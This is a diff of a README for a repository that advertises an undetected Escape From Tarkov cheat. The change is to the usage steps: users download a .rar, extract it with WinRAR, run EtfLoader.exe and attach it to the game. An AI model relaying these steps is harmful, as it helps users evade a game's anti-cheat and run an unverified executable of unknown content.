RetoWW/Escape-From-Tarkov-Undetected-Cheat-Aimbot-ESP-Wallhack-Radar-more-/README.md

 # How to use?

 1. Download this cheat
-2. Open .rar file that you downloaded and extract everything to Desktop.
+2. Open .rar file that you downloaded and EXTRACT everything to a folder in Desktop with winrar. (important to extract)
 3. Open the file EtfLoader.exe
 4. Open ETF and press Attach in the software.
 5. In game, press F11 to open Main Menu.